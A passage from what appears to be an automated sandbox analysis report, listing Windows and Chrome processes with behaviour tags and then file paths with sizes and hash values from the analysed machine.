                                                                                                                3⤵
                                                                                                                  PID:2776
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4616 /prefetch:8
                                                                                                                  3⤵
                                                                                                                    PID:1860
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3760,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4632 /prefetch:8
                                                                                                                    3⤵
                                                                                                                      PID:4376
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4336,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:8
                                                                                                                      3⤵
                                                                                                                        PID:416
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5064,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
                                                                                                                        3⤵
                                                                                                                          PID:1884
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:8
                                                                                                                          3⤵
                                                                                                                            PID:3780
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8
                                                                                                                            3⤵
                                                                                                                              PID:2120
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5088,i,5624388496396573941,16734846444132883431,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5136 /prefetch:2
                                                                                                                              3⤵
                                                                                                                                PID:4044
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                            1⤵
                                                                                                                              PID:3456
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                              1⤵
                                                                                                                                PID:3488
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:3872
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4000
                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:4092
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:3472
                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                    1⤵
                                                                                                                                      PID:4332
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:4536
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                        1⤵
                                                                                                                                          PID:3880
                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4936
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                            1⤵
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:3084
                                                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                            1⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:1348
                                                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                              PID:1552
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                              1⤵
                                                                                                                                                PID:1908
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                1⤵
                                                                                                                                                  PID:2204
                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2872
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:1164
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                      1⤵
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      PID:2704
                                                                                                                                                      • C:\Windows\System32\pcaui.exe
                                                                                                                                                        C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1228
                                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        PID:5004
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1124
                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1428
                                                                                                                                                          • C:\Windows\System32\rundll32.exe
                                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1756
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1452
                                                                                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:5228
                                                                                                                                                              • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                                "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                                1⤵
                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:5236
                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5520
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5596
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5692
                                                                                                                                                                    • C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                                                      C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      PID:7868
                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7920
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:7928
                                                                                                                                                                      • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        PID:6512
                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6520
                                                                                                                                                                        • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:6992

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

                                                                                                                                                                          Filesize

                                                                                                                                                                          400B

                                                                                                                                                                          MD5

                                                                                                                                                                          1db48fde7b8e791374fcf3a615393676

                                                                                                                                                                          SHA1

                                                                                                                                                                          c4f2ff75622ce5be33ef1221e1e15ab80c9fa794

                                                                                                                                                                          SHA256

                                                                                                                                                                          9780590cd898b20dd9e534f46ffb5f551b364e1be338c924b5ed5101d6e672d2

                                                                                                                                                                          SHA512

                                                                                                                                                                          ca51e594fc59412075926d25c9a956606f7250ae0edd0aa84bcacf2735a2ea83cc074d67dd3bd68d9d9e2c2aaa33b821fab145846a77d35ed63cb41fefa52870

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                          Filesize

                                                                                                                                                                          338B

                                                                                                                                                                          MD5

                                                                                                                                                                          9cd45a508a00affdad850257d2929722

                                                                                                                                                                          SHA1

                                                                                                                                                                          da5eba4f321d557a335b1f9ef7fd2889f65bb6da

                                                                                                                                                                          SHA256

                                                                                                                                                                          026066cacdc93596b85b781005daa4af05b4813fd3b8cb8ab0df06d376a0d319

                                                                                                                                                                          SHA512

                                                                                                                                                                          512b495883c88fbe8d5424e614ed800ba35371ae18a527684c35109b7fb354ee457e56d8e35dc95137e2afddb1c7e7382d05426246f0580d98e3e68e1626e928

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

                                                                                                                                                                          Filesize

                                                                                                                                                                          412B

                                                                                                                                                                          MD5

                                                                                                                                                                          2a2150c08610fb295fea3709772e72d0

                                                                                                                                                                          SHA1

                                                                                                                                                                          eefcc1bcd51f085bd62cb1263559b5dff3e6acbe

                                                                                                                                                                          SHA256

                                                                                                                                                                          3dcd56dd17f93b970201abfa5bf90a27f60da716d5599f950f9a53b0a7a4511e

                                                                                                                                                                          SHA512

                                                                                                                                                                          0c9fcdbd3c7baf488e44a8e621db6af587c0c4e0cf7eae8abda7694c8c697b4c19f5b3705eb5e2b1e0f42c237b64180ea4414543b99e85c94dcb0a7d6fea918c

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

                                                                                                                                                                          Filesize

                                                                                                                                                                          412B

                                                                                                                                                                          MD5

                                                                                                                                                                          97958d39c777ba87ae4c7230a0edb3a1

                                                                                                                                                                          SHA1

                                                                                                                                                                          57b14f533b35736061030efc4f8b71c00f7b072d

                                                                                                                                                                          SHA256

                                                                                                                                                                          5e27fafc30f5b094e0b8d557f8f03edfb25a7282fd65664f606c422b032c54b9

                                                                                                                                                                          SHA512

                                                                                                                                                                          227a5083201ba240a232a23961f5ea94a37b4a56e23b107de3e5eacfe92947577164f322dce867246376f1d19ec83d0fdbd0e3b69d8c62417e39eed27de06081

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                                                                                                                                                                          Filesize

                                                                                                                                                                          64KB

                                                                                                                                                                          MD5

                                                                                                                                                                          b0a40f6847934b610c24822c5c1e60b4

                                                                                                                                                                          SHA1

                                                                                                                                                                          7a984562d0765a185ab4af0f6b574b326410e7eb

                                                                                                                                                                          SHA256

                                                                                                                                                                          baa3c6350471601390dda37570a20a23567c582df132eb0fbe997f36ac831da2

                                                                                                                                                                          SHA512

                                                                                                                                                                          05453981b9bd66438c4e707a2763e00f58929f41bc2802f01ba240f3d7d46a6f2a7be9c28192ba783ef42c33d0f1e50766a70edbd61e8c48f299e0da75712a8f

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                                                                                                                                                                          Filesize

                                                                                                                                                                          4B

                                                                                                                                                                          MD5

                                                                                                                                                                          f49655f856acb8884cc0ace29216f511

                                                                                                                                                                          SHA1

                                                                                                                                                                          cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

                                                                                                                                                                          SHA256

                                                                                                                                                                          7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

                                                                                                                                                                          SHA512

                                                                                                                                                                          599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                                                                                                                                                                          Filesize

                                                                                                                                                                          992B

                                                                                                                                                                          MD5

                                                                                                                                                                          2e286dd0367aaf12ac7a61923b48c1e6

                                                                                                                                                                          SHA1

                                                                                                                                                                          6757cfcc28a86552fa5d535bd8e2c247ef7b722d

                                                                                                                                                                          SHA256

                                                                                                                                                                          d33e3afd37e7150f69f78c16355a039925bb53b624587ef37727f8954c801973

                                                                                                                                                                          SHA512

                                                                                                                                                                          c347fd6731e59da059863918e3bafa07bd50ea8f3e6f88ad8837b3301c3971376a0665d081df3d8501ae5538a306a97f06e237e679ea3bd725256cb497307511

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                          Filesize

                                                                                                                                                                          649B

                                                                                                                                                                          MD5

                                                                                                                                                                          8f23928c09fbd64df79023fb930c3394

                                                                                                                                                                          SHA1

                                                                                                                                                                          35aa292d22bd47dc293fb492c381320c6d6ffc4b

                                                                                                                                                                          SHA256

                                                                                                                                                                          76ce2f0beaaea923b28bd38cd476fb56fbfb81524d7b81017713fcdf04a8dd84

                                                                                                                                                                          SHA512

                                                                                                                                                                          9211b80af5067e227dfd3c144b1b1a0f0e189f6d174441142c27259fe91010b7f0963d3276d99c2c520fb8dd14a2f1659db3093ba9b9d77526d825ffcf215931

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                                                                                                          Filesize

                                                                                                                                                                          264KB

                                                                                                                                                                          MD5

                                                                                                                                                                          f2c1d0b9621d94f88cecb60b8a4beebf

                                                                                                                                                                          SHA1

                                                                                                                                                                          198ce31c1aae12c77a226503a5168c015ae6d89f

                                                                                                                                                                          SHA256

                                                                                                                                                                          0b28160f7ef5b058a4bb23bdce3cb804fd5995fdfe3994986c9bb463b7671473

                                                                                                                                                                          SHA512

                                                                                                                                                                          a1decaf8a421c04487823a02e7f357f081677eeebd3ddbad2830035d535a99641aa55bd1b8f2c65325c557dfa7fe9e2820e4c0690e3a548720a3290b4a9408fb

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

                                                                                                                                                                          Filesize

                                                                                                                                                                          851B

                                                                                                                                                                          MD5

                                                                                                                                                                          07ffbe5f24ca348723ff8c6c488abfb8

                                                                                                                                                                          SHA1

                                                                                                                                                                          6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                                                                                                          SHA256

                                                                                                                                                                          6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                                                                                                          SHA512

                                                                                                                                                                          7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

                                                                                                                                                                          Filesize

                                                                                                                                                                          854B

                                                                                                                                                                          MD5

                                                                                                                                                                          4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                                                                                          SHA1

                                                                                                                                                                          fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                                                                                          SHA256

                                                                                                                                                                          6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                                                                                          SHA512

                                                                                                                                                                          939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                          Filesize

                                                                                                                                                                          2KB

                                                                                                                                                                          MD5

                                                                                                                                                                          59da328887fd71c17528e45f6a97e5e9

                                                                                                                                                                          SHA1

                                                                                                                                                                          4ac5667bb923ddb3c3e235fcbc5de266b1adb23b

                                                                                                                                                                          SHA256

                                                                                                                                                                          18b2077380c9e751f28be721b64864e9ed8db2d01a7eff0eee3372d4a4e03b87

                                                                                                                                                                          SHA512

                                                                                                                                                                          35130272234031889f43d986ca90eeffcf8dec132b53f6208de5dc45455db99c1297475fa0f3b0643d1f329e308f61f14770af1f1e67bc5fc0a10b7146a40761

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                          Filesize

                                                                                                                                                                          2B

                                                                                                                                                                          MD5

                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                          SHA1

                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                          SHA256

                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                          SHA512

                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                          Filesize

                                                                                                                                                                          354B

                                                                                                                                                                          MD5

                                                                                                                                                                          21c2c72a39b9f309e164fe3cd73da604

                                                                                                                                                                          SHA1

                                                                                                                                                                          208db033fe64714ea360c1b0e3b051c59bf154b4

                                                                                                                                                                          SHA256

                                                                                                                                                                          9231d4dc60cdc463190ed8547bbfacfc1a34622854a31aa7307c41f64a5c1c17

                                                                                                                                                                          SHA512

                                                                                                                                                                          3b968dfd75c90bb02e87e736c0a094527be89bc6e5e2c76b2abde57990af9fa5188f9512a61356725ccd6c4478a9162e28a37cb7f37ef63dbb793358e73a372f

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          27e20ac87cf0b3481d4bcca32fd929e1

                                                                                                                                                                          SHA1

                                                                                                                                                                          960713f4f597ac4b973b4e578c0ffe859e19cc60

                                                                                                                                                                          SHA256

                                                                                                                                                                          85ef3a8badc207be202659c5e0fc750a75b38121804054ff9915acb78c94aaa5

                                                                                                                                                                          SHA512

                                                                                                                                                                          58ce6a776b1441f741deec2bb27dd4f57aaa85280f1fb3a567f88404014da8c4d7c55cb55197c65581856a8208a1451cc46097e15de08a6722535d0d357e4cfc

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          2f490ca8cec0f34c5206400b64a98272

                                                                                                                                                                          SHA1

                                                                                                                                                                          565a09b7c058500a4c14730938dbb4e2e8743900

                                                                                                                                                                          SHA256

                                                                                                                                                                          8869e1db49e3258d35f622b71b29486bbc0e01a3235c3019c030dda7b7663a14

                                                                                                                                                                          SHA512

                                                                                                                                                                          0abafd2dd325f4cdd2d56736719fe5aa5333639688dbffa5386327cd1e7f49f147696a0d965c8cbd8aa99128e6e0bb11c101f2443cbe6afd18b4589df8b2263c

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          56b8f9fa9b5f853f09ad8daa4cbb600d

                                                                                                                                                                          SHA1

                                                                                                                                                                          b28ef90c1c9ba7765075412b0347a81375ac53a5

                                                                                                                                                                          SHA256

                                                                                                                                                                          53c393a16152a7a890718db4c79a5d55a75bdbfc640d966f0c4d7fd37c5bcff7

                                                                                                                                                                          SHA512

                                                                                                                                                                          3897929be245cc2d2219cfaee5c3adbdcb67ea47837d78354d7574012dcd21d09571d7e492b69f668d4b20b4b2950d1cbc78fa10e2bf746d7872a1ec404aaa33

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          9843a9b1332b94eed8144e7d96c06028

                                                                                                                                                                          SHA1

                                                                                                                                                                          65f9aff7514eff00c67557efb3c61b349a569eca

                                                                                                                                                                          SHA256

                                                                                                                                                                          5d6a4de329d71f48bab8773c3f840a2fb7d43df0d0a78ea21c7b764ed679f8d8

                                                                                                                                                                          SHA512

                                                                                                                                                                          c120cf0c6d012030e4419541ca09f85512fd86bb530c24803c2705a16f7327ed8c6cc47a5d48cd13e9a6b878c48ef756d34f5aed3ffab5462f489ee358aff378

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                          Filesize

                                                                                                                                                                          9KB

                                                                                                                                                                          MD5

                                                                                                                                                                          9618b9262f7a6cfc383cba068b578f43

                                                                                                                                                                          SHA1

                                                                                                                                                                          92dbf19edf95b97b6a35ffb5c64bee3d80868867

                                                                                                                                                                          SHA256

                                                                                                                                                                          88840253092edc5f1040dd5fa06ca988600a23e5e34762eb3114988d82217e49

                                                                                                                                                                          SHA512

                                                                                                                                                                          618059ad82b9a40669de5ff46afd397f837fbeae4f69116bd97d4cd703ed8f390c3b58d2834b5e76f3383fca1935903e2b7263618bb9aae952df374473f752ff

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                          Filesize

                                                                                                                                                                          15KB

                                                                                                                                                                          MD5

                                                                                                                                                                          5872c81b5e97d2b4683494d411dac644

                                                                                                                                                                          SHA1

                                                                                                                                                                          9421b05dcba95ccb14f61efdc2bffa0f9199aa02

                                                                                                                                                                          SHA256

                                                                                                                                                                          c968914659d6c406387156925936c84ff5b2506f47e496e0977b043181138611

                                                                                                                                                                          SHA512

                                                                                                                                                                          1675c0526475ad5a4b7f1f7ac0a81a09af9e511aa60a8a17cbedaf84b5418a163bbbeec280705217337a6f5a38285eb423729cd90d1b5b876da72e05dc915a28

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                          Filesize

                                                                                                                                                                          72B

                                                                                                                                                                          MD5

                                                                                                                                                                          975b905b15e5c1a36ec3a849c7cee9bd

                                                                                                                                                                          SHA1

                                                                                                                                                                          53288001ca8263e05831fc71d867f4452cb958a5

                                                                                                                                                                          SHA256

                                                                                                                                                                          d0068e535ae265b6384728b350af53375319efd404c579a568a892bcade65b9c

                                                                                                                                                                          SHA512

                                                                                                                                                                          db38e2246e8e0dd58b3d46a818f70d489ac4bce0738850b2af757ff19a60e0e2e47c92b7bf320bd27eb04759c00220152f8b10528518a6293ecfab4b7131c593

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          232KB

                                                                                                                                                                          MD5

                                                                                                                                                                          2c98517c30c16c7a2093e6edb9badae0

                                                                                                                                                                          SHA1

                                                                                                                                                                          e9529f4be32ffc5375221b426abedd5c8e06abc6

                                                                                                                                                                          SHA256

                                                                                                                                                                          b038348eabcca8f2cbc7e063be85c0c47758d493bcdae01c9490cb2cea538710

                                                                                                                                                                          SHA512

                                                                                                                                                                          5b25436c153da9348471572a6ff829047fa8bccd45fbfc49b098fb10fc515134e1479916074b8a6b74881fe0c137ab1b7cc5d655ccd717bba49de7cb90717905

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          232KB

                                                                                                                                                                          MD5

                                                                                                                                                                          44afad56d057c6351c002b3b28123163

                                                                                                                                                                          SHA1

                                                                                                                                                                          c3a0617ee9933126e4aded93f33344d3af375778

                                                                                                                                                                          SHA256

                                                                                                                                                                          427f3f6a91d3145b8123707253494d8aca91ef013b0d34cb374bdbcebf0a4f29

                                                                                                                                                                          SHA512

                                                                                                                                                                          f51b0e795b6dc821954d5188581b049aba5cc41d6065b113a4fc2b6faf87bee092e9112a66ade88460469dea11622e32ae6619392d343af55b9727b185638616

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                          Filesize

                                                                                                                                                                          232KB

                                                                                                                                                                          MD5

                                                                                                                                                                          2ef08a5e4a157d46844796cb02696ce5

                                                                                                                                                                          SHA1

